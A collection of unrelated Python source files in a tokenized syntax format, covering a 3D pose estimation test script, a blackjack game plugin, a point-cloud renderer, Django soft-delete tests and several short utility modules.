enumerate(data)<block_start><if_stmt>cfg.TEST_MODE<eq>'run_inference'<block_start>imgs,img_path,scales=batch<line_sep>meta_data=<none><block_end><else_stmt><block_start>imgs,meta_data,img_path,scales=batch<block_end>imgs=imgs.to(device)<with_stmt>torch.no_grad()<block_start>outputs_2d,outputs_3d,outputs_rd=model(imgs)<line_sep>outputs_3d=outputs_3d.cpu()<line_sep>outputs_rd=outputs_rd.cpu()<if_stmt>cfg.DO_FLIP<block_start>imgs_flip=torch.flip(imgs [-1])<line_sep>outputs_2d_flip,outputs_3d_flip,outputs_rd_flip=model(imgs_flip)<line_sep>outputs_2d_flip=torch.flip(outputs_2d_flip dims=[-1])<line_sep># outputs_3d_flip = torch.flip(outputs_3d_flip, dims=[-1]) # outputs_rd_flip = torch.flip(outputs_rd_flip, dims=[-1]) keypoint_pair=cfg.DATASET.KEYPOINT.FLIP_ORDER<line_sep>paf_pair=cfg.DATASET.PAF.FLIP_CHANNEL<line_sep>paf_abs_pair=[x+kpt_num<for>x paf_pair]<line_sep>pair=keypoint_pair+paf_abs_pair<for_stmt>i range(len(pair))<block_start><if_stmt>i<ge>kpt_num<and>(i-kpt_num)%2<eq>0<block_start>outputs_2d[: i]<augadd>outputs_2d_flip[: pair[i]]<times>-1<block_end><else_stmt><block_start>outputs_2d[: i]<augadd>outputs_2d_flip[: pair[i]]<block_end><block_end>outputs_2d[: kpt_num:]<augmul>0.5<block_end><for_stmt>i range(len(imgs))<block_start><if_stmt>meta_data<is><not><none># remove person who was blocked <block_start>new_gt_bodys=[]<line_sep>annotation=meta_data[i].numpy()<line_sep>scale=scales[i]<for_stmt>j range(len(annotation))<block_start><if_stmt>annotation[j cfg.DATASET.ROOT_IDX 3]<g>1<block_start>new_gt_bodys.append(annotation[j])<block_end><block_end>gt_bodys=np.asarray(new_gt_bodys)<if_stmt>len(gt_bodys)<eq>0<block_start><continue><block_end># groundtruth:[person..[keypoints..[x, y, Z, score(0:None, 1:invisible, 2:visible), X, Y, Z, # f_x, f_y, cx, cy]]] <if_stmt>len(gt_bodys[0][0])<l>11<block_start>scale['f_x']=gt_bodys[0 0 7]<line_sep>scale['f_y']=gt_bodys[0 0 7]<line_sep>scale['cx']=scale['img_width']/2<line_sep>scale['cy']=scale['img_height']/2<block_end><else_stmt><block_start>scale['f_x']=gt_bodys[0 0 7]<line_sep>scale['f_y']=gt_bodys[0 0 8]<line_sep>scale['cx']=gt_bodys[0 0 9]<line_sep>scale['cy']=gt_bodys[0 0 10]<block_end><block_end><else_stmt><block_start>gt_bodys=<none><line_sep># use default values scale={k:scales[k][i].numpy()<for>k scales}<line_sep>scale['f_x']=scale['img_width']<line_sep>scale['f_y']=scale['img_width']<line_sep>scale['cx']=scale['img_width']/2<line_sep>scale['cy']=scale['img_height']/2<block_end>hmsIn=outputs_2d[i]<line_sep># if the first pair is [1, 0], uncomment the code below # hmsIn[cfg.DATASET.KEYPOINT.NUM:cfg.DATASET.KEYPOINT.NUM+2] *= -1 # outputs_3d[i, 0] *= -1 hmsIn[:cfg.DATASET.KEYPOINT.NUM]<augdiv>255<line_sep>hmsIn[cfg.DATASET.KEYPOINT.NUM:]<augdiv>127<line_sep>rDepth=outputs_rd[i][0]<line_sep># no batch implementation yet pred_bodys_2d=dapalib.connect(hmsIn rDepth cfg.DATASET.ROOT_IDX distFlag=<true>)<if_stmt>len(pred_bodys_2d)<g>0<block_start>pred_bodys_2d[: : :2]<augmul>cfg.dataset.STRIDE# resize poses to the input-net shape pred_bodys_2d=pred_bodys_2d.numpy()<block_end>pafs_3d=outputs_3d[i].numpy().transpose(1 2 0)<line_sep>root_d=outputs_rd[i][0].numpy()<line_sep>paf_3d_upsamp=cv2.resize(pafs_3d (cfg.INPUT_SHAPE[1] cfg.INPUT_SHAPE[0]) interpolation=cv2.INTER_NEAREST)<line_sep>root_d_upsamp=cv2.resize(root_d (cfg.INPUT_SHAPE[1] cfg.INPUT_SHAPE[0]) interpolation=cv2.INTER_NEAREST)<line_sep># generate 3d prediction bodys pred_bodys_2d=register_pred(pred_bodys_2d gt_bodys)<if_stmt>len(pred_bodys_2d)<eq>0<block_start><continue><block_end>pred_rdepths=generate_relZ(pred_bodys_2d paf_3d_upsamp root_d_upsamp scale)<line_sep>pred_bodys_3d=gen_3d_pose(pred_bodys_2d pred_rdepths scale)<if_stmt>refine_model<is><not><none><block_start>new_pred_bodys_3d=lift_and_refine_3d_pose(pred_bodys_2d pred_bodys_3d refine_model device=device root_n=cfg.DATASET.ROOT_IDX)<block_end><else_stmt><block_start>new_pred_bodys_3d=pred_bodys_3d<block_end><if_stmt>cfg.TEST_MODE<eq>"generate_train"<block_start>save_result_for_train_refine(pred_bodys_2d new_pred_bodys_3d gt_bodys pred_rdepths result)<block_end><else_stmt><block_start>save_result(pred_bodys_2d new_pred_bodys_3d gt_bodys pred_rdepths img_path[i] result)<block_end><block_end><block_end><block_end>dir_name=os.path.split(os.path.split(os.path.realpath(__file__))[0])[1]<line_sep>pair_file_name=os.path.join(output_dir '{}_{}_{}_{}.json'.format(dir_name cfg.TEST_MODE cfg.DATA_MODE cfg.JSON_SUFFIX_NAME))<with_stmt>open(pair_file_name 'w')<as>f<block_start>json.dump(result f)<block_end>logger.info("Pairs writed to {}".format(pair_file_name))<block_end><def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--test_mode" "-t" type=str default="run_inference" choices=['generate_train' 'generate_result' 'run_inference'] help='Type of test. One of "generate_train": generate refineNet datasets, '<concat>'"generate_result": save inference result and groundtruth, '<concat>'"run_inference": save inference result for input images.')<line_sep>parser.add_argument("--data_mode" "-d" type=str default="test" choices=['test' 'generation'] help='Only used for "generate_train" test_mode, "generation" for refineNet train dataset,'<concat>'"test" for refineNet test dataset.')<line_sep>parser.add_argument("--SMAP_path" "-p" type=str default='log/SMAP.pth' help='Path to SMAP model')<line_sep>parser.add_argument("--RefineNet_path" "-rp" type=str default='' help='Path to RefineNet model, empty means without RefineNet')<line_sep>parser.add_argument("--batch_size" type=int default=1 help='Batch_size of test')<line_sep>parser.add_argument("--do_flip" type=float default=0 help='Set to 1 if do flip when test')<line_sep>parser.add_argument("--dataset_path" type=str default="" help='Image dir path of "run_inference" test mode')<line_sep>parser.add_argument("--json_name" type=str default="" help='Add a suffix to the result json.')<line_sep>args=parser.parse_args()<line_sep>cfg.TEST_MODE=args.test_mode<line_sep>cfg.DATA_MODE=args.data_mode<line_sep>cfg.REFINE=len(args.RefineNet_path)<g>0<line_sep>cfg.DO_FLIP=args.do_flip<line_sep>cfg.JSON_SUFFIX_NAME=args.json_name<line_sep>cfg.TEST.IMG_PER_GPU=args.batch_size<line_sep>os.makedirs(cfg.TEST_DIR exist_ok=<true>)<line_sep>logger=get_logger(cfg.DATASET.NAME cfg.TEST_DIR 0 'test_log_{}.txt'.format(args.test_mode))<line_sep>model=SMAP(cfg run_efficient=cfg.RUN_EFFICIENT)<line_sep>device=torch.device(cfg.MODEL.DEVICE)<line_sep>model.to(device)<if_stmt>args.test_mode<eq>"run_inference"<block_start>test_dataset=CustomDataset(cfg args.dataset_path)<line_sep>data_loader=DataLoader(test_dataset batch_size=args.batch_size shuffle=<false>)<block_end><else_stmt><block_start>data_loader=get_test_loader(cfg num_gpu=1 local_rank=0 stage=args.data_mode)<block_end><if_stmt>cfg.REFINE<block_start>refine_model=RefineNet()<line_sep>refine_model.to(device)<line_sep>refine_model_file=args.RefineNet_path<block_end><else_stmt><block_start>refine_model=<none><line_sep>refine_model_file=""<block_end>model_file=args.SMAP_path<if_stmt>os.path.exists(model_file)<block_start>state_dict=torch.load(model_file map_location=<lambda>storage loc:storage)<line_sep>state_dict=state_dict['model']<line_sep>model.load_state_dict(state_dict)<if_stmt>os.path.exists(refine_model_file)<block_start>refine_model.load_state_dict(torch.load(refine_model_file))<block_end><elif_stmt>refine_model<is><not><none><block_start>logger.info("No such RefineNet checkpoint of {}".format(args.RefineNet_path))<line_sep><return><block_end>generate_3d_point_pairs(model refine_model data_loader cfg logger device output_dir=os.path.join(cfg.OUTPUT_DIR "result"))<block_end><else_stmt><block_start>logger.info("No such checkpoint of SMAP {}".format(args.SMAP_path))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See LICENSE in the project root # for license information. <import_from_future_stmt> absolute_import division print_function unicode_literals<line_sep># Expose Session directly. <def_stmt>Session *args **kwargs<block_start><import_from_stmt>tests.debug session<line_sep><return>session.Session(*args **kwargs)<block_end>
<import_stmt>schedule time sys os traceback<line_sep>sys.path.append(os.getcwd())<import_from_stmt>material_sync.sync_to_baidu_cloud Sync2Cloud<line_sep>p=Sync2Cloud().main<line_sep>schedule.every(1).days.at("03:00").do(p)<line_sep># schedule.every(1).minutes.do(p) print("脚本已启动")<while_stmt><true><block_start><try_stmt><block_start>schedule.run_pending()<line_sep>time.sleep(1)<block_end><except_stmt>Exception<as>e<block_start>traceback.print_exc()<line_sep>print(e)<block_end><block_end>
# Generated by Django 1.9.12 on 2017-03-09 02:05 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[]<line_sep>operations=[]<block_end>
<import_stmt>random<import_from_stmt>plugin plugin<import_from_stmt>colorama Fore<def_stmt>delay # method to pause after a series of actions have been completed. <block_start>n=input("Press enter to continue")<block_end><def_stmt>wiped_slate player# resets all hands and bets <block_start>player['hands']=[]<line_sep>player['suits']=[]<line_sep>player['bets']=[]<line_sep><return>player<block_end><def_stmt>pprinthand hand suit type='visible'# returns hand as a string which may or may not be hidden. <block_start>temphand=hand[:]<for_stmt>i range(len(temphand))<block_start><if_stmt>temphand[i]<eq>1<or>temphand[i]<eq>11<block_start>temphand[i]='A'# 1 or 11 is value of ace. <block_end>temphand[i]=str(temphand[i])+" of "+suit[i]<block_end><if_stmt>type<eq>'visible'<block_start><return>str(temphand)<block_end><elif_stmt>type<eq>'partially-visible'<block_start><return>'['+str(temphand[0])+',hidden]'<block_end><block_end><def_stmt>pprinthandlist handlist suitlist# returns handlist as a string <block_start>newhandlist=[]<for_stmt>i range(len(handlist))<block_start>newhandlist.append(pprinthand(handlist[i] suitlist[i]))<block_end><return>str(newhandlist)<block_end><def_stmt>blackjacksum orig_hand# computes the sum by assuming appropriate value of Ace. <block_start>hand=orig_hand[:]<for_stmt>i range(len(hand))<block_start><if_stmt>str(hand[i])<in>'JQK'# converts face card to their value,that is,10. <block_start>hand[i]=10<block_end><block_end><if_stmt>sum(hand)<le>11# of Ace card(either 1 or 11) acc. to the sum. <block_start><for_stmt>i range(len(hand))<block_start><if_stmt>hand[i]<eq>1<block_start>hand[i]=11<line_sep>orig_hand[i]=11<line_sep><break><block_end><block_end><block_end><elif_stmt>sum(hand)<g>21<block_start><for_stmt>i range(len(hand))<block_start><if_stmt>hand[i]<eq>11<block_start>hand[i]=1<line_sep>orig_hand[i]=1<line_sep><break><block_end><block_end><block_end><return>sum(hand) orig_hand<block_end><def_stmt>move hand suit cards suits bet# Here, hand is a nested list inside a list. It is a list of all hands of a player. # Player can have multiple hands if he/she chooses to split. <block_start>sum_,hand[0]=blackjacksum(hand[0])<line_sep>print("Your hand is" pprinthand(hand[0] suit[0]))<line_sep>print("Your sum is" sum_)<line_sep>print('---------------------------')<line_sep># checks for bust or blackjack. <if_stmt>sum_<g>21<block_start>print("You got busted!")<line_sep><return>hand suit bet<block_end><elif_stmt>sum_<eq>21<and>len(hand)<eq>2<block_start>print("Blackjack!")<line_sep><return>hand suit bet<block_end><while_stmt><true><block_start>choice=input("Press H to Hit, S to Stand, D to Double-Down, P to sPlit\n")<if_stmt>choice<in>['H' 'h']<block_start>newcard=random.choice(cards)<line_sep>newsuit=random.choice(suits)<line_sep>print("Newcard is" str(newcard)+" of "+newsuit)<line_sep>hand[0].append(newcard)<line_sep>suit[0].append(newsuit)<line_sep>print("Updated hand is" pprinthand(hand[0] suit[0]))<line_sep>sum_,hand[0]=blackjacksum(hand[0])<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><elif_stmt>choice<in>['S' 's']<block_start><return>hand suit bet<block_end><elif_stmt>choice<in>['D' 'd']<block_start>newcard=random.choice(cards)<line_sep>print("Newcard is" newcard)<line_sep>newsuit=random.choice(suits)<line_sep>hand[0].append(newcard)<line_sep>suit[0].append(newsuit)<line_sep>print("Updated hand is" pprinthand(hand[0] suit[0]))<line_sep>sum_,hand[0]=blackjacksum(hand[0])<line_sep>print("Your sum is" sum_)<if_stmt>sum_<g>21<block_start>print("You got busted!")<block_end>bet[0]=bet[0]<times>2<line_sep>print("Your new bet is" bet[0])<line_sep><return>hand suit bet<block_end><elif_stmt>choice<in>['P' 'p']<block_start><if_stmt>hand[0][0]<eq>hand[0][1]<block_start><if_stmt><not>hand[0][0]<eq>1<block_start>splitHand1=[[0 0]]<line_sep>splitHand2=[[0 0]]<line_sep>splitSuit1=[[0 0]]<line_sep>splitSuit2=[[0 0]]<line_sep>newcard1=random.choice(cards)<line_sep>newsuit1=random.choice(suits)<line_sep>print("Newcard for first split is" str(newcard1)+" of "+newsuit1)<line_sep>newcard2=random.choice(cards)<line_sep>newsuit2=random.choice(suits)<line_sep>print("Newcard for second split is" str(newcard2)+" of "+newsuit2)<line_sep>splitHand1[0][0]=hand[0][0]<line_sep>splitHand2[0][0]=hand[0][1]<line_sep>splitHand1[0][1]=newcard1<line_sep>splitHand2[0][1]=newcard2<line_sep>splitSuit1[0][0]=suit[0][0]<line_sep>splitSuit2[0][0]=suit[0][1]<line_sep>splitSuit1[0][1]=newsuit1<line_sep>splitSuit2[0][1]=newsuit2<line_sep>print("Split hands are" pprinthand(splitHand1[0] splitSuit1[0]) ", " pprinthand(splitHand2[0] splitSuit2[0]))<line_sep>sum1,splitHand1[0]=blackjacksum(splitHand1[0])<line_sep>sum2,splitHand2[0]=blackjacksum(splitHand2[0])<line_sep>print("Your sum for split 1 is" sum1)<line_sep>print("Your sum for split 2 is" sum2)<line_sep>bet1=bet[:]<line_sep>bet2=bet[:]<line_sep>splitHand1,splitSuit1,bet1=move(splitHand1 splitSuit1 cards suits bet1)<line_sep>splitHand2,splitSuit2,bet2=move(splitHand2 splitSuit2 cards suits bet2)<line_sep>splitHand1.extend(splitHand2)# converting both hands to a single list splitSuit1.extend(splitSuit2)<line_sep>bet1.extend(bet2)# converting both bets to a single list <return>splitHand1 splitSuit1 bet1<block_end><else_stmt><block_start>print("Sorry,you can't split aces")<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><block_end><else_stmt><block_start>print("Sorry, you can only split hands with identical cards")<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><block_end><else_stmt><block_start>print("Please try again with a valid choice.")<block_end><block_end><block_end>@plugin('blackjack')<def_stmt>blackjack jarvis s<block_start>jarvis.say("Welcome to the casino! Let's play blackjack!" Fore.GREEN)<line_sep>player={"hands":[] "suits":[] "bets":[] 'profit':[]}<line_sep>cards=[1 2 3 4 5 6 7 8 9 10 'J' 'Q' 'K']<line_sep>suits=['spades' 'hearts' 'diamonds' 'clubs']<line_sep>choice='y'<line_sep>delay()<line_sep># Instructions jarvis.say('How to play:' Fore.GREEN)<line_sep>jarvis.say('-->The goal of blackjack is to beat the dealer\'s hand without going over 21.' Fore.CYAN)<line_sep>jarvis.say('-->Face cards are worth 10. Aces are worth 1 or 11, whichever makes a better hand.' Fore.CYAN)<line_sep>jarvis.say('-->Each player starts with two cards, one of the dealer\'s cards is hidden until the end.' Fore.CYAN)<line_sep>jarvis.say('-->To \'Hit\' is to ask for another card. To \'Stand\' is to hold your total and end your turn.' Fore.CYAN)<line_sep>jarvis.say('-->If you go over 21 you bust, and the dealer wins regardless of the dealer\'s hand.' Fore.CYAN)<line_sep>jarvis.say('-->If you are dealt 21 from the start (Ace & 10), you got a blackjack.' Fore.CYAN)<line_sep>jarvis.say('-->Blackjack means you win 1.5 the amount of your bet.' Fore.CYAN)<line_sep>jarvis.say('-->Dealer will hit until his/her cards total 17 or higher.' Fore.CYAN)<line_sep>jarvis.say('-->Doubling is like a hit, only the bet is doubled and you only get one more card.' Fore.CYAN)<line_sep>jarvis.say('-->Split can be done when you have two of the same card - the pair is split into two hands.' Fore.CYAN)<line_sep>jarvis.say('-->Splitting also doubles the bet, because each new hand is worth the original bet.' Fore.CYAN)<line_sep>jarvis.say('-->You cannot split two aces.' Fore.CYAN)<line_sep>jarvis.say('-->You can double on a hand resulting from a split, tripling or quadrupling you bet.' Fore.CYAN)<while_stmt>choice<in>"Yy"<block_start>jarvis.say('Shuffling the cards....' Fore.BLUE)<line_sep>jarvis.say("Let's start the game!" Fore.BLUE)<line_sep># Bets jarvis.say("How much are you betting?" Fore.BLUE)<line_sep>bet=jarvis.input_number()<line_sep>player['bets'].append(bet)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Cards jarvis.say("Dealing the cards............" Fore.BLUE)<line_sep>jarvis.say("Your cards...." Fore.BLUE)<line_sep>hand=[random.choice(cards) random.choice(cards)]<line_sep>suit=[random.choice(suits) random.choice(suits)]<line_sep>player["hands"].append(hand)<line_sep>player["suits"].append(suit)<line_sep>jarvis.say(pprinthand(hand suit))<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Dealer's cards dealerhand=[random.choice(cards) random.choice(cards)]<line_sep>dealersuit=[random.choice(suits) random.choice(suits)]<line_sep>jarvis.say("Dealer hand: "+pprinthand(dealerhand dealersuit type='partially-visible') Fore.MAGENTA)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Players' moves jarvis.say("It's your turn, make your choice!" Fore.BLUE)<line_sep>player['hands'],player['suits'],player['bets']=move(player['hands'] player['suits'] cards suits player['bets'])<line_sep>jarvis.say("Your hands and respective bets for this round are:" Fore.BLUE)<line_sep>jarvis.say(pprinthandlist(player['hands'] player['suits'])+" "+str(player['bets']) Fore.BLUE)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Dealer's moves jarvis.say("Dealer hand: "+pprinthand(dealerhand dealersuit) Fore.MAGENTA)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("Dealer's sum is "+str(dealersum) Fore.MAGENTA)<while_stmt>dealersum<l>17<or>(dealersum<eq>17<and>11<in>dealerhand)# condition which determines if dealer hits or not. <block_start>jarvis.say("Dealer draws another card" Fore.MAGENTA)<line_sep>dealerhand.append(random.choice(cards))<line_sep>dealersuit.append(random.choice(suits))<line_sep>jarvis.say("Newcard is "+str(dealerhand[-1])+" of "+str(dealersuit[-1]) Fore.MAGENTA)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("Dealer's sum is "+str(dealersum) Fore.MAGENTA)<line_sep>jarvis.say("Dealer's hand is "+pprinthand(dealerhand dealersuit) Fore.MAGENTA)<block_end>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Profit Calculation jarvis.say("Let's see your results " Fore.BLUE)<for_stmt>j range(len(player['hands']))<block_start>hand=player['hands'][j]<line_sep>suit=player['suits'][j]<line_sep>bet=player['bets'][j]<line_sep>sum_,hand=blackjacksum(hand)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("For the hand- "+pprinthand(hand suit)+' sum is-'+str(sum_) Fore.BLUE)<if_stmt>len(hand)<eq>2<and>sum_<eq>21<block_start>jarvis.say("Blackjack!" Fore.BLUE)<line_sep>profit=bet<times>1.5<line_sep>player['profit'].append(bet<times>1.5)<block_end><elif_stmt>sum_<g>21<block_start>jarvis.say("Busted" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>dealersum<g>21<block_start>jarvis.say("Dealer Busted" Fore.BLUE)<line_sep>profit=bet<times>1<line_sep>player['profit'].append(bet<times>1)<block_end><elif_stmt>dealersum<g>sum_<block_start>jarvis.say("You lost" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>sum_<g>dealersum<block_start>jarvis.say("You win" Fore.BLUE)<line_sep>profit=bet<times>1<line_sep>player['profit'].append(bet<times>1)<block_end><elif_stmt>sum_<eq>21<and>dealersum<eq>21<and>len(dealerhand)<eq>2<and>len(hand)<g>2<block_start>jarvis.say("You lost" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>sum_<eq>dealersum<block_start>jarvis.say("Push" Fore.BLUE)<line_sep>profit=bet<times>0<line_sep>player['profit'].append(bet<times>0)<block_end>jarvis.say("Profit is- "+str(profit) Fore.BLUE)<block_end>players=wiped_slate(player)<line_sep>choice=jarvis.input("Do you wish to play another round?Y/n \n" Fore.GREEN)<block_end>jarvis.say("OK then, Let's see the results" Fore.GREEN)<line_sep>jarvis.say('---------------------------')<line_sep>profit=sum(player['profit'])<if_stmt>profit<ge>0<block_start>jarvis.say("Your total profit is "+str(profit) Fore.GREEN)<block_end><else_stmt><block_start>jarvis.say("Your total loss is "+str(profit<times>-1) Fore.GREEN)<block_end>jarvis.say("Goodbye, Let's play again sometime!" Fore.GREEN)<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>gbrwrappermaker=cms.EDAnalyzer('GBRWrapperMaker')<line_sep>
# encoding: utf-8 <import_stmt>unittest<import_from_stmt>zhihu Question<class_stmt>QuestionTestCase(unittest.TestCase)<block_start><def_stmt>test_follow_question_with_id self<block_start>data=Question(id=32096743).follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_unfollow_question_with_id self<block_start>data=Question(id=32096743).unfollow_question()<line_sep>self.assertEqual({"is_following":<false>} data)<block_end><def_stmt>test_follow_question_with_url self<block_start>data=Question(url='https://www.zhihu.com/question/58684385').follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_follow_question_with_answer_url self<block_start>""" 也支持回答的URL,因为从回答中也能找到问题的ID :return: """<line_sep>data=Question(url='https://www.zhihu.com/question/59001738/answer/160832685').follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_unfollow_question_with_url self<block_start>data=Question(url='https://www.zhihu.com/question/58684385').unfollow_question()<line_sep>self.assertEqual({"is_following":<false>} data)<block_end><block_end>
"""image manager"""<import_from_stmt>.puller ImagePuller<import_from_stmt>.inspector inspect_all<line_sep>
<import_stmt>os<import_stmt>numpy<as>np<def_stmt>standardize_bbox pcl points_per_object<block_start>pt_indices=np.random.choice(pcl.shape[0] points_per_object replace=<false>)<line_sep>np.random.shuffle(pt_indices)<line_sep>pcl=pcl[pt_indices]# n by 3 mins=np.amin(pcl axis=0)<line_sep>maxs=np.amax(pcl axis=0)<line_sep>center=(mins+maxs)/2.<line_sep>scale=np.amax(maxs-mins)<line_sep>print("Center: {}, Scale: {}".format(center scale))<line_sep>result=((pcl-center)/scale).astype(np.float32)# [-0.5, 0.5] <return>result<block_end>xml_head=""" <scene version="0.5.0"> <integrator type="path"> <integer name="maxDepth" value="-1"/> </integrator> <sensor type="perspective"> <float name="farClip" value="100"/> <float name="nearClip" value="0.1"/> <transform name="toWorld"> <lookat origin="3,3,3" target="0,0,0" up="0,0,1"/> </transform> <float name="fov" value="25"/> <sampler type="ldsampler"> <integer name="sampleCount" value="256"/> </sampler> <film type="ldrfilm"> <integer name="width" value="1600"/> <integer name="height" value="1200"/> <rfilter type="gaussian"/> <boolean name="banner" value="false"/> </film> </sensor> <bsdf type="roughplastic" id="surfaceMaterial"> <string name="distribution" value="ggx"/> <float name="alpha" value="0.05"/> <float name="intIOR" value="1.46"/> <rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 --> </bsdf> """<line_sep>xml_ball_segment=""" <shape type="sphere"> <float name="radius" value="0.02"/> <transform name="toWorld"> <translate x="{}" y="{}" z="{}"/> <scale value="0.7"/> </transform> <bsdf type="diffuse"> <rgb name="reflectance" value="{},{},{}"/> </bsdf> </shape> """<line_sep>xml_tail=""" <shape type="rectangle"> <ref name="bsdf" id="surfaceMaterial"/> <transform name="toWorld"> <scale x="10" y="10" z="10"/> <translate x="0" y="0" z="-0.5"/> </transform> </shape> <shape type="rectangle"> <transform name="toWorld"> <scale x="10" y="10" z="1"/> <lookat origin="-4,4,20" target="0,0,0" up="0,0,1"/> </transform> <emitter type="area"> <rgb name="radiance" value="6,6,6"/> </emitter> </shape> </scene> """<def_stmt>colormap x y z<block_start>vec=np.array([x y z])<line_sep>vec=np.clip(vec 0.001 1.0)<line_sep>norm=np.sqrt(np.sum(vec<power>2))<line_sep>vec<augdiv>norm<line_sep><return>[vec[0] vec[1] vec[2]]<block_end><def_stmt>mitsuba pcl path clr=<none><block_start>xml_segments=[xml_head]<line_sep># pcl = standardize_bbox(pcl, 2048) pcl=pcl[: [2 0 1]]<line_sep>pcl[: 0]<augmul>-1<line_sep>h=np.min(pcl[: 2])<for_stmt>i range(pcl.shape[0])<block_start><if_stmt>clr<eq><none><block_start>color=colormap(pcl[i 0]+0.5 pcl[i 1]+0.5 pcl[i 2]+0.5)<block_end><else_stmt><block_start>color=clr<block_end><if_stmt>h<l>-0.25<block_start>xml_segments.append(xml_ball_segment.format(pcl[i 0] pcl[i 1] pcl[i 2]-h-0.6875 *color))<block_end><else_stmt><block_start>xml_segments.append(xml_ball_segment.format(pcl[i 0] pcl[i 1] pcl[i 2] *color))<block_end><block_end>xml_segments.append(xml_tail)<line_sep>xml_content=str.join('' xml_segments)<with_stmt>open(path 'w')<as>f<block_start>f.write(xml_content)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>item=0<line_sep>split='train'<line_sep>dataset_name='shapenetcorev2'<line_sep>root=os.getcwd()<line_sep>save_root=os.path.join("image" dataset_name)<if_stmt><not>os.path.exists(save_root)<block_start>os.makedirs(save_root)<block_end><import_from_stmt>dataset Dataset<line_sep>d=Dataset(root=root dataset_name=dataset_name num_points=2048 split=split random_rotation=<false> load_name=<true>)<line_sep>print("datasize:" d.__len__())<line_sep>pts,lb,n=d[item]<line_sep>print(pts.size() pts.type() lb.size() lb.type() n)<line_sep>path=os.path.join(save_root dataset_name+'_'+split+str(item)+'_'+str(n)+'.xml')<line_sep>mitsuba(pts.numpy() path)<block_end>
<import_stmt>unittest<import_from_stmt>django.db models<import_from_stmt>..config DELETED_VISIBLE<import_from_stmt>..models SafeDeleteModel<import_from_stmt>.testcase SafeDeleteTestCase<class_stmt>ManyToManyChild(models.Model)<block_start><pass><block_end><class_stmt>ManyToManyOtherChild(models.Model)<block_start><pass><block_end><class_stmt>ManyToManyOtherChildThrough(SafeDeleteModel)<block_start>other_child=models.ForeignKey(ManyToManyOtherChild on_delete=models.CASCADE)<line_sep>parent=models.ForeignKey('ManyToManyParent' on_delete=models.CASCADE)<block_end><class_stmt>ManyToManyParent(SafeDeleteModel)<block_start>children=models.ManyToManyField(ManyToManyChild blank=<true> related_name='parents')<line_sep>other_children=models.ManyToManyField(ManyToManyOtherChild blank=<true> related_name='parents' through=ManyToManyOtherChildThrough )<block_end><class_stmt>ManyToManyTestCase(SafeDeleteTestCase)<block_start>@unittest.expectedFailure<def_stmt>test_many_to_many_through self<block_start>""" This is not supported yet! """<line_sep>parent=ManyToManyParent.objects.create()<line_sep>other_child=ManyToManyOtherChild.objects.create()<line_sep>through=ManyToManyOtherChildThrough.objects.create(other_child=other_child parent=parent)<line_sep>self.assertEqual(parent.manytomanyotherchildthrough_set.all().count() 1)<line_sep>self.assertEqual(parent.other_children.all().count() 1)<line_sep>through.delete()<line_sep>self.assertEqual(parent.manytomanyotherchildthrough_set.all().count() 0)<line_sep>self.assertEqual(parent.other_children.all().count() 0)<block_end><def_stmt>test_many_to_many self<block_start>"""Test whether related queries still works."""<line_sep>parent1=ManyToManyParent.objects.create()<line_sep>parent2=ManyToManyParent.objects.create()<line_sep>child=ManyToManyChild.objects.create()<line_sep>parent1.children.add(child)<line_sep>parent2.children.add(child)<line_sep># The child should still have both parents self.assertEqual(child.parents.all().count() 2)<line_sep># Soft deleting one parent, should "hide" it from the related field parent1.delete()<line_sep>self.assertEqual(child.parents.all().count() 1)<line_sep># But explicitly saying you want to "show" them, shouldn't hide them self.assertEqual(child.parents.all(force_visibility=DELETED_VISIBLE).count() 2)<block_end><block_end>
## # Copyright (c) 2014-2017 Apple Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## """ OpenDirectory live service tests. """<import_from_future_stmt> print_function<import_from_stmt>itertools chain<import_from_stmt>uuid UUID<import_from_stmt>twisted.trial unittest<import_from_stmt>twisted.internet.defer inlineCallbacks returnValue<try_stmt><block_start><import_from_stmt>twext.who.opendirectory DirectoryService<line_sep>moduleImported=<true><block_end><except_stmt><block_start>moduleImported=<false><line_sep>print("Could not import OpenDirectory")<block_end><if_stmt>moduleImported<block_start><import_from_stmt>twext.who.expression CompoundExpression Operand MatchExpression MatchType MatchFlags <import_from_stmt>txdav.who.directory CalendarDirectoryServiceMixin<import_from_stmt>txdav.who.opendirectory DirectoryService<as>OpenDirectoryService<class_stmt>CalOpenDirectoryService(OpenDirectoryService CalendarDirectoryServiceMixin)<block_start><pass><block_end>LOCAL_SHORTNAMES="odtestalbert odtestbill odtestcarl odtestdavid 